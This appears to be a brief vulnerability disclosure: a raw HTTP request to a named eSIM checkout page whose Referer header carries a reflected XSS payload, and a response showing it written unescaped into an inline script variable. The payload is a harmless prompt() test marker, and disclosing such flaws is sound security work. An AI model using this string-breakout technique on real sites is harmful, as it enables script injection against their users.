
Send Raw Request
-----------------

GET /checkout/ HTTP/2
Host: esim.orange-zen.simoptions.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: "-prompt('XSS_TEST_BY_PANKAJ')-"


Resposne
---------
script>
    var affiliate_slug = "";
    var affiliate_cookie_expire = "";
    var http_referrer = ""-prompt('XSS_TEST_BY_PANKAJ')-"";
    var creative_id = "";
  </script>
  <!-- /Affiliate -->

Here XSS will be executed




